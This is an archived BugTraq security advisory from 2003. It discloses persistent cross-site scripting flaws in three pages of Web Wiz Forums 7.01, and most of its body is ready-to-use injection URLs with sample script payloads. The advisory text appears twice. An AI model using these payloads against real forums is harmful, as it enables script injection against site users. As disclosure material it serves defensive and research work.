BugTraq
Back to list
|
Post reply
Web Wiz Forums ver. 7.01
Oct 21 2003 08:41PM
HEX (hex hex net ru)
Informations :
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Patched version : none
Website : http://www.webwizforums.com
Problems : Permanent XSS
Objects :
°°°°°°°
- forum_members.asp
- members.asp
- pm_buddy_list.asp
Exploits :
°°°°°°°°
http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%
22
Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22
http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22
Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22
http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&
code=1
Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1
Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.webwizforums.com...
[ Local time 2:30 | Åñëè á ìèøêè áûëè ï÷åëàìè... ]
[ Copyright by [HEX] | mailto:hex (at) hex.net (dot) ru [email concealed] ]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Patched version : none
Website : http://www.webwizforums.com
Problems : Permanent XSS
Objects :
°°°°°°°
- forum_members.asp
- members.asp
- pm_buddy_list.asp
Exploits :
°°°°°°°°
http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%
22
Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22
http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22
Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22
http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&
code=1
Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1
Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.webwizforums.com...
[ Local time 2:30 | Åñëè á ìèøêè áûëè ï÷åëàìè... ]
[ Copyright by [HEX] | mailto:hex (at) hex.net (dot) ru [email concealed] ]
[ reply ]